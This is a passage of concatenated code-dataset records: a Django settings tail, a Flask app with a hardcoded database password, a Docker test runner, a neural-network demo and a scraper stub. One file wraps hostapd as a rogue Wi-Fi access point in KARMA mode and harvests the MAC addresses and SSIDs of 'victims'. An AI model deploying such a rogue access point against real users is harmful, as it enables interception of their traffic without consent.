Neptune\nNEPTUNE_EARL = ''\n# suitable\nSUITABLE_USERNAME = ''\nSUITABLE_PASSWORD = ''\nSUITABLE_SERVER = ''\nSUITABLE_SUITABLE_INSTITUTION_ID = ''\nSUITABLE_CSV_OUTPUT = ''\nSUITABLE_BOUNDARY = ''\n\n##################\n# LOCAL SETTINGS #\n##################\n\n# Allow any settings to be defined in local.py which should be\n# ignored in your version control system allowing for settings to be\n# defined per machine.\n\n# Instead of doing \"from .local import *\", we use exec so that\n# local has full access to everything defined in this module.\n# Also force into sys.modules so it's visible to Django's autoreload.\n\nphile = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'local.py')\nif os.path.exists(phile):\n import imp\n import sys\n module_name = '{0}.settings.local'.format(PROJECT_APP)\n module = imp.new_module(module_name)\n module.__file__ = phile\n sys.modules[module_name] = module\n exec(open(phile, 'rb').read())\n","sub_path":"djmapache/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":14928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"383574363","text":"from flask import Flask, render_template, request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom send_email import send_email\nfrom sqlalchemy import func\n\napp = Flask(__name__)\ndb = SQLAlchemy(app)\n\napp.config['SQLALCHEMY_DATABASE_URI']='postgresql://postgres:3682@localhost/test'\ndb=SQLAlchemy(app)\n\nclass Data(db.Model):\n __tablename__=\"data\"\n id=db.Column(db.Integer, primary_key=True)\n email_=db.Column(db.String(120), unique=True)\n height_=db.Column(db.Integer)\n\n def __init__(self, email_, height_):\n self.email_=email_\n self.height_=height_\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/success/\", methods=['POST'])\ndef success():\n if request.method == 'POST':\n email = request.form[\"email\"]\n height = request.form[\"height\"]\n data= Data(email,height)\n if 
db.session.query(Data).filter(Data.email_== email).count() == 0:\n db.session.add(data)\n db.session.commit()\n avgerage_height = db.session.query(func.avg(Data.height_)).scalar()\n avgerage_height = round(avgerage_height,1)\n count = db.session.query(Data.height_).count()\n send_email(email,height, avgerage_height, count)\n return render_template(\"success.html\")\n return render_template(\"index.html\", text=\"Email Is Already Exists\")\n\nif __name__ == \"__main__\":\n app.debig=True\n app.run()","sub_path":"Application_9/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"646276406","text":"import os\nimport signal\n\nfrom hokusai.lib.command import command\nfrom hokusai.lib.config import config\nfrom hokusai.lib.common import print_green, shout, EXIT_SIGNALS\nfrom hokusai.lib.exceptions import CalledProcessError, HokusaiError\n\n@command()\ndef test(build, cleanup):\n docker_compose_yml = os.path.join(os.getcwd(), 'hokusai/test.yml')\n if not os.path.isfile(docker_compose_yml):\n raise HokusaiError(\"Yaml file %s does not exist.\" % docker_compose_yml)\n\n def on_cleanup(*args):\n shout(\"docker-compose -f %s -p hokusai stop\" % docker_compose_yml)\n shout(\"docker-compose -f %s -p hokusai rm --force\" % docker_compose_yml)\n\n if cleanup:\n for sig in EXIT_SIGNALS:\n signal.signal(sig, on_cleanup)\n\n opts = ' --abort-on-container-exit'\n if build:\n opts += ' --build'\n\n print_green(\"Starting test environment... Press Ctrl+C to stop.\")\n try:\n shout(\"docker-compose -f %s -p hokusai up%s\" % (docker_compose_yml, opts), print_output=True)\n return_code = int(shout(\"docker wait hokusai_%s_1\" % config.project_name))\n except CalledProcessError:\n if cleanup: on_cleanup()\n raise HokusaiError('Tests Failed')\n\n if return_code:\n raise HokusaiError('Tests Failed - Exit Code: %s\\n' % return_code, return_code=return_code)\n else:\n print_green(\"Tests Passed\")\n\n if cleanup: on_cleanup()\n\n return return_code\n","sub_path":"hokusai/commands/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"382037113","text":"#!/usr/bin/env python2\n\"\"\"\nThis module was made to wrap the hostapd\n\"\"\"\n\nimport os\nimport threading\nimport collections\nimport ctypes\nimport re\nimport roguehostapd.hostapd_constants as hostapd_constants\n\n\nclass KarmaData(ctypes.Structure):\n \"\"\"\n Handle the hostapd return mac/ssid data\n \"\"\"\n pass\n\n\nKarmaData._fields_ = [\n (\"is_assoc\", ctypes.c_ubyte),\n (\"ssid_len\", ctypes.c_size_t),\n (\"ssid\", ctypes.c_ubyte * 32),\n (\"mac_addr\", ctypes.c_ubyte * 6),\n (\"next_data\", ctypes.POINTER(KarmaData))]\n\n\nclass HostapdConfig(object):\n \"\"\"\n Handle the Hostapd configuration\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Setup the class with all the given arguments\n\n :param self: A HostapdConfig object\n :type self: HostapdConfig\n :return: None\n :rtype: None\n \"\"\"\n\n # configurations for hostapd.conf\n self.configuration_dict = collections.defaultdict()\n # initialize the hostapd configuration\n self.initialize_hostapd_config()\n\n # configuration for hostapd command line options\n self.options = {\n 'debug_level': None,\n 'key_data': None,\n 'timestamp': None,\n 'version': None,\n 'mute': None,\n # Disable the eloop terminate in hostapd and control by\n # wifiphisher\n 
'eloop_term_disable': None,\n }\n\n # custom action and relies on transformation by roguehostapd\n self.custom_action = {\n # the deny mac addresses\n 'deny_macs': self.update_black_macs,\n }\n # hostapd debug level\n self.debug_level = hostapd_constants.HOSTAPD_DEBUG_OFF\n\n def initialize_hostapd_config(self):\n \"\"\"\n Parse the hostapd.conf file in the hostapd source code and\n update to the attribute configuation_dict\n\n :param self: A HostapdConfig object\n :type self: HostapdConfig\n :return: None\n :rtype: None\n \"\"\"\n\n work_dir = os.path.dirname(os.path.abspath(__file__))\n hostapd_config = os.path.join(work_dir,\n hostapd_constants.HOSTAPD_DIR,\n 'hostapd.conf')\n # initialize the hostapd configuration dictionary\n with open(hostapd_config, 'r') as filep:\n for line in filep:\n m_obj = re.match(r'#([\\S-]+)=[\\S-].*$', line)\n if m_obj:\n key = m_obj.group(1)\n self.configuration_dict[key] = ''\n # initialize the basic information\n self.configuration_dict['ssid'] = hostapd_constants.SSID\n self.configuration_dict['channel'] = hostapd_constants.CHANNEL\n self.configuration_dict['beacon_int'] = hostapd_constants.BEACON_INT\n self.configuration_dict['hw_mode'] = hostapd_constants.HW_MODE\n self.configuration_dict['interface'] = hostapd_constants.INTERFACE\n self.configuration_dict['karma_enable'] = hostapd_constants.KARMA_ENABLE\n self.configuration_dict['deny_macs'] = []\n\n def update_black_macs(self, output_fp):\n \"\"\"\n Update the black mac addresses for hostapd\n\n :param self: A HostapdConfig object\n :param output_fp: Output file pointer\n :type self: HostapdConfig\n :type output_fp: file\n :return: None\n :rtype: None\n \"\"\"\n\n output_fp.write('macaddr_acl=0\\n')\n output_fp.write('deny_mac_file='+hostapd_constants.DENY_MACS_PATH+'\\n')\n with open(hostapd_constants.DENY_MACS_PATH, 'w') as writer:\n for mac_addr in self.configuration_dict['deny_macs']:\n writer.write(mac_addr+'\\n')\n\n def update_wps_configuration(self):\n \"\"\"\n Update the WPS configuration for hostapd\n\n :param self: A HostapdConfig object\n :type self: HostapdConfig\n :return: None\n :rtype: None\n \"\"\"\n\n # enable WPS\n self.configuration_dict['wps_state'] = '2'\n self.configuration_dict['ap_setup_locked'] = '1'\n self.configuration_dict['uuid'] = '12345678-9abc-def0-1234-56789abcdef0'\n self.configuration_dict['device_name'] = 'Wireless AP'\n self.configuration_dict['manufacturer'] = 'Company'\n self.configuration_dict['model_name'] = 'WAP'\n self.configuration_dict['model_number'] = '123'\n self.configuration_dict['serial_number'] = '12345'\n self.configuration_dict['device_type'] = '6-0050F204-1'\n self.configuration_dict['os_version'] = '01020300'\n self.configuration_dict['config_methods'] =\\\n 'label virtual_display virtual_push_button keypad'\n self.configuration_dict['eap_server'] = '1'\n\n def update_security_info(self, config_dict):\n \"\"\"\n Update the security configuration if passphrase is specified\n\n :param self: A HostapdConfig object\n :param config_dict: hostapd configuration dictionary\n :type self: HostapdConfig\n :type config_dict: dict\n :return: None\n :rtype: None\n \"\"\"\n\n # update WPS information\n self.update_wps_configuration()\n\n if 'wpa_passphrase' in config_dict and config_dict['wpa_passphrase']:\n self.configuration_dict['wpa_key_mgmt'] = \"WPA-PSK\"\n self.configuration_dict['wpa_pairwise'] = \"TKIP CCMP\"\n self.configuration_dict['wpa'] = '3'\n\n def update_configs(self, config_dict):\n \"\"\"\n Update the attributes based on the configuration 
dictionary\n\n :param self: A HostapdConfig object\n :param config_dict: hostapd configuration dictionary\n :type self: HostapdConfig\n :type config_dict: dict\n :return: None\n :rtype: None\n \"\"\"\n\n for key, value in config_dict.iteritems():\n if (key in self.configuration_dict) and value:\n self.configuration_dict[key] = value\n elif key not in self.configuration_dict:\n raise KeyError('Unsupported hostapd configuation!')\n\n self.update_security_info(config_dict)\n\n def _update_debug_level(self, options):\n \"\"\"\n Update the debug level from options dictionary\n\n :param self: A HostapdConfig object\n :type self: HostapdConfig\n :param options: configurations for command line options\n :type options: dict\n :return: None\n :rtype: None\n \"\"\"\n self.debug_level = options['debug_level']\n if self.debug_level == hostapd_constants.HOSTAPD_DEBUG_VERBOSE:\n self.options['debug_level'] = tuple(['-ddd'])\n\n def update_options(self, options):\n \"\"\"\n Update the comand line options\n\n :param self: A HostapdConfig object\n :type self: HostapdConfig\n :param options: configurations for command line options\n :type options: dict\n :return: None\n :rtype: None\n ..note: update the command line options\n \"\"\"\n\n for key in options:\n if key in self.options and options[key]:\n if key == 'debug_level':\n self._update_debug_level(options)\n elif key == 'key_data':\n self.options[key] = tuple(['-K'])\n elif key == 'timestamp':\n self.options[key] = tuple(['-t'])\n elif key == 'version':\n self.options[key] = tuple(['-v'])\n elif key == 'mute':\n self.options[key] = tuple(['-s'])\n elif key == 'eloop_term_disable':\n self.options[key] = tuple(['-E'])\n\n def write_configs(self, config_dict, options):\n \"\"\"\n Write the configurations to the file\n\n :param self: A HostapdConfig object\n :type self: HostapdConfig\n :param config_dict: configurations for hostapd.conf\n :type config_dict: dict\n :param options: hostapd command line options\n :type options: dict\n :return: None\n :rtype: None\n ..note: write the configuration file in the path /tmp/hostapd.conf\n \"\"\"\n\n self.update_options(options)\n self.update_configs(config_dict)\n with open(hostapd_constants.HOSTAPD_CONF_PATH, 'w') as conf:\n for key, value in self.configuration_dict.iteritems():\n if value:\n if key not in self.custom_action:\n conf.write(key + '=' + str(value) + '\\n')\n else:\n # callback for the custom action\n self.custom_action[key](conf)\n\n @classmethod\n def is_ssid_valid(cls, ssid):\n \"\"\"\n Check if the specified ssid is valid\n\n :param cls: A HostapdConfig class\n :param ssid: The service set identifier\n :type cls: HostapdConfig class\n :type ssid: str\n :return: True if the ssid is valid\n :rtype: bool\n \"\"\"\n\n return bool(len(ssid) < 33)\n\n\nclass Hostapd(object):\n \"\"\"\n Hostapd wrapper class\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Contruct the class\n\n :param self: A Hostapd object\n :type self: Hostapd\n :return: None\n :rtype: None\n \"\"\"\n\n self.config_obj = None\n self.hostapd_thread = None\n self.hostapd_lib = None\n\n @staticmethod\n def _parse_karma_data(karma_data):\n \"\"\"\n get the associated clients' mac address and essid\n\n :param self: A Hostapd object\n :type self: Hostapd\n :param karma_data: A KarmaData object\n :type karma_data: KarmaData\n\n :return: A list of tuple of essid and mac address tuple\n :rtype: list\n \"\"\"\n\n ret = []\n if karma_data:\n current = karma_data\n while current:\n if current.contents.is_assoc:\n # convert ssid_len to integer\n ssid_len 
= int(current.contents.ssid_len)\n # convert mac address to string\n mac_addr = current.contents.mac_addr\n mac_l = [format(mac_addr[i], 'x') for i in range(6)]\n mac_str = ':'.join(mac_l)\n\n # convert ssid to string\n ssid_buf = current.contents.ssid\n ssid_list = [ssid_buf[i] for i in range(ssid_len)]\n ssid = ''.join(map(chr, ssid_list))\n ret.append((mac_str, ssid))\n current = current.contents.next_data\n return ret\n\n def get_karma_data(self):\n \"\"\"\n get the data for the KARMA attack victims from hostapd\n\n :param self: A Hostapd object\n :type self: Hostapd\n\n :return: A list of tuple of essid and mac address tuple\n :rtype: list\n \"\"\"\n\n karma_data = self.hostapd_lib.get_assoc_karma_data()\n mac_ssid_pairs = self._parse_karma_data(karma_data)\n return mac_ssid_pairs\n\n def is_alive(self):\n \"\"\"\n API for check if the hostapd thread is running\n :param self: A Hostapd object\n :type self: Hostapd\n :return: True if the hostapd is running else False\n :rtype: bool\n \"\"\"\n return self.hostapd_thread.is_alive()\n\n def start(self, hostapd_config, options):\n \"\"\"\n Start the hostapd process\n\n :param self: A Hostapd object\n :type self: Hostapd\n :param hostapd_config: Hostapd configuration for hostapd.conf\n :type hostapd_config: dict\n :param options: Hostapd command line options\n :type options: dict\n :return: None\n :rtype: None\n ..note: the start function uses ctypes to load the shared library\n of hostapd and use it to call the main function to lunch the AP\n \"\"\"\n\n self.config_obj = HostapdConfig()\n # update the hostapd configuration based on user input\n self.config_obj.write_configs(hostapd_config, options)\n\n work_dir = os.path.dirname(os.path.abspath(__file__))\n exe_path = os.path.join(work_dir, hostapd_constants.HOSTAPD_EXE_PATH)\n shared_lib_path = os.path.join(\n work_dir, hostapd_constants.HOSTAPD_SHARED_LIB_PATH)\n\n config_path = hostapd_constants.HOSTAPD_CONF_PATH\n\n # get the hostapd command to lunch the hostapd\n hostapd_cmd = [exe_path, config_path]\n for key in self.config_obj.options:\n if self.config_obj.options[key]:\n hostapd_cmd += self.config_obj.options[key]\n num_of_args = len(hostapd_cmd)\n str_arr_type = ctypes.c_char_p * num_of_args\n hostapd_cmd = str_arr_type(*hostapd_cmd)\n\n # get the hostapd shared library\n self.hostapd_lib = ctypes.cdll.LoadLibrary(shared_lib_path)\n\n # init hostapd lib info\n self.hostapd_lib.get_assoc_karma_data.restype = ctypes.POINTER(\n KarmaData)\n\n # start the hostapd thread\n self.hostapd_thread = threading.Thread(\n target=self.hostapd_lib.main, args=(len(hostapd_cmd), hostapd_cmd))\n self.hostapd_thread.start()\n\n def stop(self):\n \"\"\"\n Stop the hostapd\n\n :param self: A Hostapd object\n :type self: Hostapd\n :return: None\n :rtype: None\n ..note: the stop function uses the eloop_terminate function in hostapd\n shared library to stop AP.\n \"\"\"\n self.hostapd_lib.eloop_terminate()\n if self.hostapd_thread.is_alive():\n self.hostapd_thread.join(5)\n\n if os.path.isfile(hostapd_constants.HOSTAPD_CONF_PATH):\n os.remove(hostapd_constants.HOSTAPD_CONF_PATH)\n if os.path.isfile(hostapd_constants.DENY_MACS_PATH):\n os.remove(hostapd_constants.DENY_MACS_PATH)\n\nif __name__ == '__main__':\n\n HOSTAPD_CONFIG_DICT = {\n 'ssid': 'test',\n 'interface': 'wlan0',\n 'karma_enable': 1,\n 'deny_macs': ['00:00:00:11:22:33']\n }\n\n HOSTAPD_OPTION_DICT = {\n 'debug_level': hostapd_constants.HOSTAPD_DEBUG_OFF,\n 'key_data': True,\n 'timestamp': False,\n 'version': False,\n 'mute': True,\n 
'eloop_term_disable': True}\n HOSTAPD_OBJ = Hostapd()\n HOSTAPD_OBJ.start(HOSTAPD_CONFIG_DICT, HOSTAPD_OPTION_DICT)\n import time\n while True:\n try:\n time.sleep(1)\n except KeyboardInterrupt:\n HOSTAPD_OBJ.stop()\n break\n","sub_path":"roguehostapd/hostapd_controller.py","file_name":"hostapd_controller.py","file_ext":"py","file_size_in_byte":14468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"650315182","text":"import os\nprint(os.__file__)\n\nimport numpy as np\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib.collections import PatchCollection\nfrom matplotlib.patches import Circle\nimport matplotlib.animation as animation\nimport time\n\n\nfrom sklearn.datasets import make_circles\n\n# In[2]:\n\n\n# PROBLEM\nn = 500\np = 2\n\nX, Y = make_circles(n_samples=n, factor=0.5, noise=0.05)\nY = Y[:, np.newaxis]\n\ndef plot_circle():\n plt.scatter(X[Y[:, 0] == 0, 0], X[Y[:, 0] == 0, 1], c=\"skyblue\")\n plt.scatter(X[Y[:, 0] == 1, 0], X[Y[:, 0] == 1, 1], c=\"salmon\")\n plt.axis(\"equal\")\n plt.show()\n \n#plot_circle()\n\n\n# In[3]:\n\n\n# FUNCIONES DE ACTIVACION\nsigm = (lambda x: 1 / (1 + np.e ** (-x)),\n lambda x: x * (1 - x))\n\nrelu = lambda x: np.maximum(0, x)\n\nl2_cost = (lambda Yp, Yr: np.mean((Yp - Yr) ** 2),\n lambda Yp, Yr: (Yp - Yr))\n\ndef plot_activation_function():\n _x = np.linspace(-5, 5, 100)\n plt.plot(_x, relu(_x))\n\n\n# In[4]:\n\n\n# CAPA DE LA RN\nclass NNLayer:\n num_connections = 0\n num_neurons = 0\n activation_function = sigm\n\n def __init__(self, num_conections, num_neurons, activation_function):\n self.num_neurons = num_neurons\n self.num_connections = num_conections\n self.activation_function = activation_function\n\n self.bias = np.random.rand(1, num_neurons) * 2 - 1\n self.weights = np.random.rand(num_conections, num_neurons) * 2 - 1\n\n def info(self, l):\n print('Capa {} - N:{} C:{}'.format(l, self.num_neurons, self.num_connections))\n\n def val(self,n):\n return self.bias[0][n]\n\n# In[5]:\n\n# RED N\nclass NN():\n\n def __init__(self):\n self.layer = []\n self.layers = 0\n self.topology = []\n self.hidden_layers = 0\n self.out = [(None, X)]\n self.artist = {}\n self.loss = 0\n self.trains = 0\n\n def from_topology(self, topology: object, act_f: object) -> object:\n self.topology = topology\n self.layers = len(topology)\n self.hidden_layers = self.layers - 2\n\n # add layers\n for l, t in enumerate(topology[:-1]):\n print('Add layer {2:d}: con({0:2d}) neurons({1:2d})'.format(topology[l], topology[l + 1], l))\n self.layer.append(NNLayer(topology[l], topology[l + 1], act_f))\n\n #todo: add last layer\n self.layer.append(NNLayer(topology[-1], 1, act_f))\n\n def from_layers(self, num_inputs: int = 0, layers: object = []) -> object:\n self.layers = len(layers)\n self.hidden_layers = self.layers - 1\n self.topology = [num_inputs]\n\n for n, l in enumerate(layers):\n print('Add layer {2:d}: con({0:2d}) neurons({1:2d})'.format(l.num_connections, l.num_neurons, n))\n self.layer.append(l)\n self.topology.append(l.num_neurons)\n\n def fit(self,X):\n self.out = [(None, X)]\n\n # Forward pass\n for layer in nn.layer:\n z = self.out[-1][1] @ layer.weights + layer.bias\n a = layer.activation_function[0](z)\n\n self.out.append((z, a))\n\n return self.out[-1][1]\n\n def train(self,X,Y,lr=0.5):\n # Backward pass\n self.trains += 1\n deltas = []\n self.fit(X)\n for l in reversed(range(0, len(self.layer))):\n z = self.out[l + 1][0]\n a = self.out[l + 1][1]\n\n layer = self.layer[l]\n\n if l == len(self.layer) 
- 1:\n deltas.insert(0, l2_cost[1](a, Y) * layer.activation_function[1](a))\n else:\n deltas.insert(0, deltas[0] @ _W.T * layer.activation_function[1](a))\n\n _W = layer.weights\n\n # Gradient descent\n layer.bias = layer.bias - np.mean(deltas[0], axis=0, keepdims=True) * lr\n layer.weights = layer.weights - self.out[l][1].T @ deltas[0] * lr\n\n #self.artist[0, 0, 1].set_text(\"{0:.3f}\".format(X))\n #self.artist[0, 1, 1].set_text(\"{0:.3f}\".format(Y))\n # update loss\n self.loss = l2_cost[0](self.out[-1][1], Y)\n return self.out[-1][1]\n\n def closs(self,Y):\n self.loss = l2_cost[0](self.out[-1][1],Y)\n return self.loss\n\n def draw(self, ax, left, right, bottom, top):\n ims = []\n '''\n Draw a neural network cartoon using matplotilb.\n\n :usage:\n >>> fig = plt.figure(figsize=(12, 12))\n >>> draw_neural_net(fig.gca(), .1, .9, .1, .9, [4, 7, 2])\n\n :parameters:\n - ax : matplotlib.axes.AxesSubplot\n The axes on which to plot the cartoon (get e.g. by plt.gca())\n - left : float\n The center of the leftmost node(s) will be placed here\n - right : float\n The center of the rightmost node(s) will be placed here\n - bottom : float\n The center of the bottommost node(s) will be placed here\n - top : float\n The center of the topmost node(s) will be placed here\n - layer_sizes : list of int\n List of layer sizes, including input and output dimensionality\n '''\n v_spacing = (top - bottom) / float(max(self.topology))\n h_spacing = (right - left) / float(len(self.topology) - 1)\n # Nodes\n for n, layer_size in enumerate(self.topology):\n layer_top = v_spacing * (layer_size - 1) / 2. + (top + bottom) / 2.\n for m in range(layer_size):\n x, y = (n * h_spacing + left, layer_top - m * v_spacing)\n print(\"c\",n,\" n\",m)\n color=\"w\"\n val = 0\n\n if n > 0:\n val = self.layer[n-1].val(m)\n if val > 0:\n color=\"lime\"\n else:\n color=\"tomato\"\n\n circle = plt.Circle((x,y), v_spacing / 4., color=color, ec='k', zorder=4)\n ax.add_artist(circle)\n label = plt.text(x,y,\"{2:.3f}\".format(n,m,val),fontsize=8, ha=\"center\", zorder=5)\n ax.add_artist(label)\n\n self.artist[n, m, 0] = circle\n self.artist[n, m, 1] = label\n\n x, y = (1,1)\n label = plt.text(x, y, \"Loss {0:.5f} - Iter {1:4d}\".format(0,0), fontsize=8, ha=\"center\", zorder=5,color=\"green\")\n ax.add_artist(label)\n self.artist[n+1,m+1,1] = label\n\n # Edges\n for n, (layer_size_a, layer_size_b) in enumerate(zip(self.topology[:-1], self.topology[1:])):\n layer_top = v_spacing * (layer_size - 1) / 2. + (top + bottom) / 2.\n layer_top_a = v_spacing * (layer_size_a - 1) / 2. + (top + bottom) / 2.\n layer_top_b = v_spacing * (layer_size_b - 1) / 2. 
+ (top + bottom) / 2.\n for m in range(layer_size_a):\n x, y = (n * h_spacing + left, layer_top - m * v_spacing)\n for o in range(layer_size_b):\n line = plt.Line2D([n * h_spacing + left, (n + 1) * h_spacing + left],\n [layer_top_a - m * v_spacing, layer_top_b - o * v_spacing], c='silver')\n ax.add_artist(line)\n self.artist[m,n,2,o] = plt.text(n * h_spacing + left, (n + 1) * layer_top_b - o * v_spacing,\"{0:.3f}\".format(0),color=\"blue\",fontsize=6)\n\n\n\n def update_draw(self):\n for n, layer_size in enumerate(self.topology):\n for m in range(layer_size):\n color = \"seashell\"\n val = 0\n if n > 0:\n val = self.layer[n - 1].val(m)\n if val > 0:\n color = \"lime\"\n else:\n color = \"tomato\"\n self.artist[n, m, 0].set_color(color)\n self.artist[n, m, 1].set_text(\"{0:.3f}\".format(val))\n self.artist[n+1,m+1,1].set_text(\"Loss {0:.5f} - Iter {1:4d}\".format(self.loss,self.trains))\n for n, (layer_size_a, layer_size_b) in enumerate(zip(self.topology[:-1], self.topology[1:])):\n for m in range(layer_size_a):\n for o in range(layer_size_b):\n self.artist[m,n,2,o].set_text(\"{0:.3f}\".format(self.layer[n].weights[1][o]))\n\n\n# In[16]:\n\n\n# FUNCION DE ENTRENAMIENTO\n\ntopology = [p, 16, 8, 1]\n\n\n\ndef train(nn, X, Y, l2_cost, lr=0.25, train=True):\n out = [(None, X)]\n\n # Forward pass\n for layer in nn.layer[:-1]:\n z = out[-1][1] @ layer.weights + layer.bias\n a = layer.activation_function[0](z)\n\n out.append((z, a))\n\n if train:\n\n # Backward pass\n deltas = []\n\n for l in reversed(range(0, nn.layers - 1)):\n z = out[l + 1][0]\n a = out[l + 1][1]\n\n if l == nn.layers - 2:\n deltas.insert(0, l2_cost[1](a, Y) * nn.layer[l].activation_function[1](a))\n else:\n deltas.insert(0, deltas[0] @ _W.T * nn.layer[l].activation_function[1](a))\n\n _W = nn.layer[l].weights\n\n # Gradient descent\n nn.layer[l].bias = nn.layer[l].bias - np.mean(deltas[0], axis=0, keepdims=True) * lr\n nn.layer[l].weights = nn.layer[l].weights - out[l][1].T @ deltas[0] * lr\n\n return out[-1][1]\n\n\nfrom IPython.display import clear_output\ndef visual_plot():\n # VISUALIZACIÓN Y TEST\n\n import time\n \n\n loss = []\n\n for i in range(1000):\n\n # Entrenemos a la red!\n pY = train(nn, X, Y, l2_cost, lr=0.05)\n\n if i % 25 == 0:\n\n print(pY)\n\n loss.append(l2_cost[0](pY, Y))\n\n res = 100\n\n _x0 = np.linspace(-1.5, 1.5, res)\n _x1 = np.linspace(-1.5, 1.5, res)\n\n _Y = np.zeros((res, res))\n\n for i0, x0 in enumerate(_x0):\n for i1, x1 in enumerate(_x1):\n _Y[i0, i1] = train(nn, np.array([[x0, x1]]), Y, l2_cost, train=False)[0][0]\n\n plt.pcolormesh(_x0, _x1, _Y, cmap=\"coolwarm\")\n plt.axis(\"equal\")\n\n plt.scatter(X[Y[:, 0] == 0, 0], X[Y[:, 0] == 0, 1], c=\"skyblue\")\n plt.scatter(X[Y[:, 0] == 1, 0], X[Y[:, 0] == 1, 1], c=\"salmon\")\n\n clear_output(wait=True)\n plt.show()\n\n plt.plot(range(len(loss)), loss)\n\n time.sleep(0.1)\n \n plt.show()\n # print(pY)\n\n\nfrom IPython.display import clear_output\n\n\ndef visual_plot2():\n # VISUALIZACIÓN Y TEST\n\n import time\n\n loss = []\n\n for i in range(1000):\n\n # Entrenemos a la red!\n pY = nn.train(X, Y, lr=0.5)\n\n if i % 25 == 0:\n\n #print(pY)\n\n cost = l2_cost[0](pY, Y)\n loss.append(nn.closs(Y))\n print(i,cost)\n\n res = 100\n\n _x0 = np.linspace(-1.5, 1.5, res)\n _x1 = np.linspace(-1.5, 1.5, res)\n\n _Y = np.zeros((res, res))\n\n for i0, x0 in enumerate(_x0):\n for i1, x1 in enumerate(_x1):\n _Y[i0, i1] = nn.fit(np.array([[x0, x1]]))[0][0]\n\n plt.pcolormesh(_x0, _x1, _Y, cmap=\"coolwarm\")\n plt.axis(\"equal\")\n\n plt.scatter(X[Y[:, 0] == 
0, 0], X[Y[:, 0] == 0, 1], c=\"skyblue\")\n plt.scatter(X[Y[:, 0] == 1, 0], X[Y[:, 0] == 1, 1], c=\"salmon\")\n\n clear_output(wait=True)\n plt.show()\n\n plt.plot(range(len(loss)), loss)\n\n time.sleep(0.1)\n plt.show()\n\nloss = []\n\ndef vis_train(n):\n print(n)\n img = []\n # Entrenemos a la red!\n pY = nn.train(X, Y, lr=0.5)\n loss.append(nn.loss)\n nn.update_draw()\n #.plot(range(len(loss)),loss)\n return img\n\nzz = NN()\nzz.from_topology([p, 4, 8, 1], sigm)\n\nl1 = NNLayer(2, 4, sigm)\nl2 = NNLayer(4, 8, sigm)\nl3 = NNLayer(8, 1, sigm)\n\nnn = NN()\nnn.from_layers(2, [l1, l2, l3])\nprint(nn.topology)\n#from Draw_NN import draw_neural_net\n\n\nfig = plt.figure(figsize=(12, 12))\nax = fig.gca()\nax.axis('off')\n\nnn.draw(ax, .1, .9, .1, .9)\nani = animation.FuncAnimation(fig, vis_train, frames=100, interval=4, blit=True)\n#visual_plot2()\nplt.show()\n\n","sub_path":"Red_Neuronal2.py","file_name":"Red_Neuronal2.py","file_ext":"py","file_size_in_byte":11997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"572005279","text":"\nimport logging\nimport re\nfrom collections import namedtuple\nimport cssselect\nimport locale\nfrom amcatclient import AmcatAPI\nfrom lxml import html\nimport requests\nfrom datetime import datetime\n\nfrom rsslib import create_connection\nimport csv\nimport sys\n\n\n\ndef polish(textstring):\n #This function polishes the full text of the articles - it separated the lead from the rest by ||| and separates paragraphs and subtitles by ||.\n lines = textstring.strip().split('\\n')\n lead = lines[0].strip()\n rest = '||'.join( [l.strip() for l in lines[1:] if l.strip()] )\n if rest: result = lead + ' ||| ' + rest\n else: result = lead\n return result.strip()\n\n\ndef get_css(tree, selection, text=True, error=True):\n res = tree.cssselect(selection)\n if len(res) != 1:\n if not error:\n return None\n raise ValueError(\"Selection {selection} yielded {n} results\".format(n=len(res), **locals()))\n return res[0]\n\n\ndef get_links(conn):\n cur = conn.cursor()\n cur.execute(\"SELECT link FROM articles where medium ='telegraaf.nl'\")\n rows = list(cur.fetchall())\n db_links = []\n for row in rows:\n id = row[0]\n db_links.append(id)\n return db_links\n\n\ndef get_meta(conn,url):\n cur = conn.cursor()\n cur.execute(f\"SELECT title, medium, date FROM articles where link ='{url}'\")\n title, medium, date = list(cur.fetchall())[0]\n return {\"title\": title,\n \"publisher\": medium,\n \"date\": date}\n\ndef scrape_article(session, url):\n page = session.get(url)\n if page.status_code == 404:\n return\n page.raise_for_status()\n open(\"/tmp/test7.html\", \"w\").write(page.text)\n tree = html.fromstring(page.text)\n for label in tree.cssselect(\"span.label\"):\n if label.text_content().strip().startswith(\"Liveblog\"):\n return None\n lead_ps = tree.cssselect('p.ArticleIntroBlock__paragraph')\n body_ps = tree.xpath('//div[@data-element=\"articleBodyBlocks\"]/p')\n text = \"\\n\\n\".join(p.text_content() for p in lead_ps + body_ps)\n return {\"text\": text}\n\nCOOKIES = {\n '__cfduid':'d56655838cd13e536c63a84867a1cd55c1585123110',\n 'clientid':\"ck871dfn22m9y568461ch66fv\",\n 
